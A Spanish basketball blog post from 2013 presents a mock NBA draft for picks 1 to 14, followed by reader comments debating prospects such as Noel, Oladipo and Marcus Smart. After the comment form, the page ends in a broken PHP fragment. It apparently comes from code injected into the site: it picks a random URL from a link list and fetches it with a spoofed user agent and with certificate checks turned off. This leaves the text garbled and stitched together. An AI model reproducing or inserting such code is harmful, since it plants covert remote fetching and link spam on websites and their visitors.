TJNBA Mock draft v 2.0

15 de June de 2013 por Jose_Dantley

A falta de dos semanas para el draft actualizamos nuestro anterior mock (1 y 2). No deja de ser una apuesta diferente a las que circulan generalmente por internet. Como siempre, queda abierto a cualquier crítica, sea de los que creen ciegamente en agujeros negros –Muhammad- o en aquellos amantes de la igualdad que valoran del mismo modo al cristal de Bohemia –Noel- que al puro acero.

1. Cleveland Cavaliers – Otto Porter  SF – 19 años/ 6’9″/ 200 lb -Georgetown, Sophomore

Llegan noticias de Cleveland de todos los colores, probablemente la mayoría inventadas, pero no es menos cierto que cada vez son más las dudas sobre un futuro libre de lesiones para Nerlens Noel. Así que vamos a tomar un camino diferente al del último mock. En lugar de pensar si es Noel o McLemore, nos vamos a la opción fácil: Otto Porter. No enamora pero parece más seguro. Repitamos todos: “parece”.

2. Orlando Magic – Victor Oladipo  SG – 21 años/ 6’4″/ 215 lb -Indiana, Junior

Raro será que Oladipo no se convierta en un favorito del público allá donde vaya. Las dudas sobre la salud de Noel y sobre las ganas de ganar de McLemore quizá lleven a Orlando a decantarse por el incansable Oladipo. El problema será cuando se den cuenta de que alguien tiene que crear juego para anotar.

3. Washington Wizards – Anthony Bennett  SF/PF – 20 años/ 6’7″/ 240 lb -UNLV, Freshman

Si las dudas se siguen extendiendo, McLemore y Noel pueden seguir cayendo. Bennett es uno de los dos o tres jugadores con más “upside”, que a estas alturas todos los devoradores de información sobre el draft tenemos claro que significa potencial. Bennett trae tantas dudas como Noel y McLemore pero encaja más en el perfil que busca Washington.

4. Charlotte Bobcats – Ben McLemore  SG – 20 años/ 6’5″/ 190 lb -Kansas, Freshman

McLemore no puede caer más, Noel no puede caer más, pero alguno deberá hacerlo si a estas alturas los equipos han decidido ir a por otras opciones. Kemba Walker-McLemore-MKG suena como un backcourt interesantísimo para construir. Todo dependerá de cómo vea Michael Jordan el futuro de McLemore. Nadie más exigente que él para evaluar un escolta.

5. Phoenix Suns – Nerlens Noel  PF/C – 19 años/ 7’0″/ 206 lb -Kentucky, Freshman

No demoramos más la caída de Noel para que podamos seguir escribiendo en este blog sin tener que escondernos. No cabe duda de que Noel sano será defensivamente una bestia. Comparte con mitos como Olajuwon y David Robinson las mejores estadísticas de robos+tapones de la historia de la NCAA. Si sale bien, Noel será un factor clave para el desarrollo de la franquicia. Si sale mal, algún puesto de GM quedará vacante, especialmente si es elegido por los Cavs. Por los Suns y en el pick 5, el riesgo de despido es menor.

6. New Orleans Pelicans – Alex Len  C – 19 años/ 7’1″/ 255 lb -Maryland, Sophomore

No nos sorprendería ver a Len mucho más arriba. De los muchos buenos centers de este año es probablemente el que más clase tiene. Si llega a la 6, vemos difícil que pase de los Pelicans

7. Sacramento Kings –  Trey Burke  PG – 20 años/ 6’1″/ 185 lb -Michigan, Sophomore

Por no saber, a estas alturas no se sabe ni quién tomará la decisión en Sacramento. Así que difícil será adivinar a quién elegirá. Burke es la opción más segura del draft. Puede que su nivel acabe siendo el de un Calderón, lo cual tampoco es mala opción. También es posible que en la capital de California piensen que Thomas es suficiente para cubrir el puesto de base titular y apunten a un acompañante fiable de Cousins, que podría ser Zeller.

8. Detroit Pistons – Shabazz Muhammad  SF – 20 años/ 6’6″/ 222 lb -UCLA, Freshman

Si Burke llegara a la 8 sería el elegido, lo cual supondría cambiar el esquema de futuro de los Pistons y el rol que jugaría Knight. Pero en otro caso, quizá la presión de buscar un killer en un equipo de mentalidad poco ganadora puede pesar. Muhammad es un killer. El problema es que lo es gastando demasiadas balas. La opción McCollum también sería posible. No descartamos a Michael Carter-Williams

9. Minnesota Timberwolves –  Kentavious Caldwell-Pope  SG – 20 años/ 6’6″/ 204 lb -Georgia, Sophomore

Los Wolves necesitan un tirador. Caldwell-Pope lo es y aporta además en defensa. McCollum también sería una opción.

10. Portland Trail Blazers – C.J. McCollum  PG/SG – 21 años/ 6’3″/ 197 lb -Lehigh, Senior

Para esta elección hemos utilizado un método científico. Nos hemos ido a la página de Facebook de los Blazers y aparecía McCollum. Lástima que lo vayan cambiando porque a la hora de escribir el mock, aparece Caldwell-Pope. McCollum puede ser un buen complemento de Lillard. De hecho, McCollum aspira a ser el Lillard de 2013.

11. Philadelphia 76ers – Cody Zeller  PF/C – 20 años/ 7’0″/ 230 lb -Indiana, Sophomore

Zeller acabará el periodo de mocks siendo tan infravalorado como sobrevalorado estaba hace un año. Zeller puede encajar perfectamente en unos Sixers en reconstrucción tras el fiasco de Bynum.

12. Oklahoma City Thunder – Steven Adams  C – 19 años/ 7’0″/ 255 lb -Pittsburgh, Freshman

Un center de futuro que jugará en la D-League el tiempo que sea necesario. OKC busca un sustituto de Perkins que les proporcione intimidación. De meter canastas ya se encargan otros.

13. Dallas Mavericks – Giannis Antetokoumpo  SF – 18 años/ 6’9″/ 200 lb -Grecia

Dallas probablemente buscará un jugador que se quede en Europa y utilizar una opción que les da el convenio colectivo para que no les cuente el salario y así poder atacar el mercado de agentes libres (¿Howard?). Antetokoumpo puede estar en el CAI Zaragoza mientras se forma. No es mal sitio. Otra opción es Gobert o Saric, pero Saric es posible que a última hora renuncie al draft 2013.

14. Utah Jazz – Michael Carter-Williams  PG – 21 años/ 6’6″/ 184 lb -Syracuse, Sophomore

Carter-Williams es uno de los jugadores más difíciles de proyectar. Sus dos fuertes son enormes: distribución y defensa. Pero sus contras son también enormes: tiro y descontrol. Que pase de la 14 sería desperdiciar una buena apuesta.

Volveremos la semana que viene con un draft más completo.

Comenta

14 comentarios a esta entrada

  1. JHC dice:
    #1

    si yo fuera cleveland iríaa por Noel, pese a ser propenso a las lesiones, es el jugador que mas les puede ayudar aunque eso lleve a sentar a Tristan Thompson

      Citar

  2. L.Casei dice:
    #2

    Yo apuesto a que Orlando escoge en el #2 a Bennett para jugar de PF por muy “undersized” que sea… y a que va a ser el rookie del año. Es un cañón, pura sangre NBA.

    Dudo que mis Blazers escojan a McCollum… no por su calidad, sino porque va a ser un PG claramente en la NBA (no SG) y ya tenemos a Lillard y Maynor, además de Nolan Smith. Los tiros van yo creo claramente por un interior, lo que se pueda escoger en un #10 como tenemos: un Cody Zeller si hay suerte (difícil), un Alex Len, un Mason Plumlee estaría bien, Olynyk o Adams… poco más hay.
    En cuanto a Carter-Williams, yo creo que debería haber esperado un año más para el salto, lo mismo que pensaba de Kendall Marshall este año, como se ha demostrado. Carter-Williams tiene gran potencial pero muy por definir… y de acuerdo con que es buen defensor, por talla y por piernas, pero hay que verlo en la NBA, que no es lo mismo que defender en la sempiterna zona 2/3 de Jim Boeheim con los Orange de Syracuse.

    O nos sorprenden mucho, o éste no será el mejor draft de la historia… Sorprendámonos.

      Citar

  3. nba dice:
    #3

    Yo a muchos de los que se postulan como numeros altos en el draft, les recomendaria quedarse en la universidad y completar su ciclo universitario, este año no veo a nadie del que verdad digas este tiene que estar ya en la NBA, y para ir a la D-league mejor terminar de formarte , aunque sea a costa de retrasar un poco mas el conseguir un contrato por una pasta, aunque todos sabemos lo influyentes que suelen ser todo el sequito que acompañan a todos estos crios en su etapa de NCAA

      Citar

  4. jose_dantley dice:
    #4

    nba:
    Yo a muchos de los que se postulan como numeros altos en el draft, les recomendaria quedarse en la universidad y completar su ciclo universitario, este año no veo a nadie del que verdad digas este tiene que estar ya en la NBA, y para ir a la D-league mejor terminar de formarte , aunque sea a costa de retrasar un poco mas el conseguir un contrato por una pasta, aunque todos sabemos lo influyentes que suelen ser todo el sequito que acompañan a todos estos crios en su etapa de NCAA

    Es una opción, pero siempre está el riesgo de una lesión que te retire de por vida. Hay casos y casos. Por ejemplo, Cody Zeller ya habría ganado a estas alturas dos o tres millones de dólares, o sea, vida resuelta. El año pasado habría sido fácil un top-5 porque hacer un temporadón de freshman viste mucho y este año es top-10 … o no.

    Es una cuestión más financiera que deportiva. Deportivamente, está claro que este año salen muchos verdísimos, MCW, Adams, Archie Goodwin … Está el caso de Marcus Smart. Deportivamente saldrá más hecho, pero visto como está el tema este año, probablemente habría sido nº 2 para Orlando, que son 4 millones de dólares.

      Citar

  5. jose_dantley dice:
    #5

    L.Casei:
    Yo apuesto a que Orlando escoge en el #2 a Bennett para jugar de PF por muy “undersized” que sea… y a que va a ser el rookie del año. Es un cañón, pura sangre NBA.

    Muy de acuerdo, tiene mucho nivel, pero también mucho riesgo. No es nada descartable.

    Lo de Portland con McCollum, pues no sé, Maynor y Smith no dan la talla. McCollum puede aportar algunos minutos de 2. Y para hombres altos ya tienen a Meyers en formación. Con su pick no le va a llegar nadie que a priori supere claramente a Meyers a corto plazo. Si llega Zeller, será Zeller eso parece claro.

      Citar

  6. jose_dantley dice:
    #6

    JHC:
    si yo fuera cleveland iríaa por Noel, pese a ser propenso a las lesiones, es el jugador que mas les puede ayudar aunque eso lleve a sentar a Tristan Thompson

    Es el debate. Les puede ayudar, pero no desde la consulta de un médico. Está claro que esta decisión es casi más médica que deportiva.

      Citar

  7. safd dice:
    #7

    jose_dantley: Es una opción, pero siempre está el riesgo de una lesión que te retire de por vida. Hay casos y casos. Por ejemplo, Cody Zeller ya habría ganado a estas alturas dos o tres millones de dólares, o sea, vida resuelta. El año pasado habría sido fácil un top-5 porque hacer un temporadón de freshman viste mucho y este año es top-10 … o no.

    Es una cuestión más financiera que deportiva. Deportivamente, está claro que este año salen muchos verdísimos, MCW, Adams, Archie Goodwin … Está el caso de Marcus Smart. Deportivamente saldrá más hecho, pero visto como está el tema este año, probablemente habría sido nº 2 para Orlando, que son 4 millones de dólares.

    Smart este año iba a salir arriba porque era el mejor base del draft (bueno, y este año casi se podria decir que mejor jugador si no top3, pero iba a salir arriba simplemente porque era el que Orlando queria por ser el mejor base). Pero eso lo va a seguir siendo el año que viene casi seguro (si no el mejor el segundo como mucho) despues de un año mas en la NCAA, asique sera top8 con la gorra a no ser que tenga mala suerte con los equipos de loteria o con alguna lesion en temporada. Vaya que tampoco creo yo que vaya a perder mucha mucha pasta… para los niveles de un jugador de la NBA claro, ojala la tuviese yo XD

      Citar

  8. txusma dice:
    #8

    safd: Smart este año iba a salir arriba porque era el mejor base del draft (bueno, y este año casi se podria decir que mejor jugador si no top3, pero iba a salir arriba simplemente porque era el que Orlando queria por ser el mejor base). Pero eso lo va a seguir siendo el año que viene casi seguro (si no el mejor el segundo como mucho) despues de un año mas en la NCAA, asique sera top8 con la gorra a no ser que tenga mala suerte con los equipos de loteria o con alguna lesion en temporada. Vaya que tampoco creo yo que vaya a perder mucha mucha pasta… para los niveles de un jugador de la NBA claro, ojala la tuviese yo XD

    Cuidado que un pick 2 cobra 3’8 kilos y un pick 8 2’1. 1’7 kilos es muchísima pasta. Pero lo realmente importante es la posibilidad de que te lesiones de por vida o te rompas la rodilla por 3 sitios. Si Noel no se hubiera lesionado sería número 1 sin dudarlo y ahora hay mock que lo bajan hasta el 6 incluso. Yo si fuera Smart me habría presentado sin duda.

    Por otro lado no creo q Magic vaya a por Benett. Tienen a Andrew Nicholson cocinándose y Tobias Harrias tb puede jugar de 4. Pudiendo pillar a un Oladipo o un McLemore no creo que se decanten por otro 4. Y a mí los “undersized” me dan un miedo…

    He visto mocks que dan como número 1 a… Alex Len. Creo q nunca había visto un draft tan abierto

      Citar

  9. txusma dice:
    #9

    Y os habéis fijado que Otto Porter tira igual que Prince? Són clónicos! 😀

      Citar

  10. L.Casei dice:
    #10

    Sí, pero Otto es diestro y Tayshaun, zurdo… también se parece mucho a Austin Daye… trío de clones, hasta en el tono de piel… aunque Otto Porter siendo fibroso va a ser (es ya) más potente físicamente.

      Citar

  11. Denise dice:
    #11

    txusma: Cuidado que un pick 2 cobra 3’8 kilos y un pick 8 2’1. 1’7 kilos es muchísima pasta. Pero lo realmente importante es la posibilidad de que te lesiones de por vida o te rompas la rodilla por 3 sitios. Si Noel no se hubiera lesionado sería número 1 sin dudarlo y ahora hay mock que lo bajan hasta el 6 incluso. Yo si fuera Smart me habría presentado sin duda. Por otro lado no creo q Magic vaya a por Benett. Tienen a Andrew Nicholson cocinándose y Tobias Harrias tb puede jugar de 4. Pudiendo pillar a un Oladipo o un McLemore no creo que se decanten por otro 4. Y a mí los “undersized” me dan un miedo…He visto mocks que dan como número 1 a… Alex Len. Creo q nunca había visto un draft tan abierto

    +1000.
    Smart es un poco idiota, podría haberse solucionado la vida declarandose elegible, habría sido número 2 fijo, Orlando practicamente hizo público que lo elegeirian a él, y ahora prefiere quedarse en la NCAA donde como bien decis te puede pasar una lesión a lo Kevin Ware o algo así, y echar a perder no tu carrera sino la seguridad economica de tu vida.

    Tambien de acuerdo con Txusma, no creo que Orlando eliga a Bennett, no necesita a nadie en la pintura salvo que consiguiese traer a un All-Star.
    Además, cada vez son más los rumores que apuntan a que Afflalo será traspasado dejando el camino libre al exterior que puedan draftear, el cual creo que será finalmente McLemore si Cavs no se lo llevan antes. La opción de Orlando por Trey Burke ultimamente ya ni se plante.

      Citar

  12. JHC dice:
    #12

    para mi de lo que mejor pinta del draft es Oladipo (un tio con sangre en la venas y no horchata como muchos) Mclemore y algunos de los muchisimos center como Len, Ollynyck y zeller

      Citar

  13. jose_dantley dice:
    #13

    Algún rumor apunta a Len como nº 1. Noel además empieza a hablar con equipos más abajo del 1. Este draft puede acabar de cualquier manera. Puede haber sorpresas por todos sitios.

    De momento hoy era el día para borrarse de la lista y entre los nombres importantes tenemos a Saric. Ha decidido no presentarse. 2014 es un gran draft, pero parece que tiene confianza en demostrar más y poder subir el año que viene.

      Citar

  14. jose_dantley dice:
    #14

    He visto mocks que dan como número 1 a… Alex Len. Creo q nunca había visto un draft tan abierto

    Pues como digo, ya no solo son mocks, también hay rumores. Aunque nunca se sabe si son interesados.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>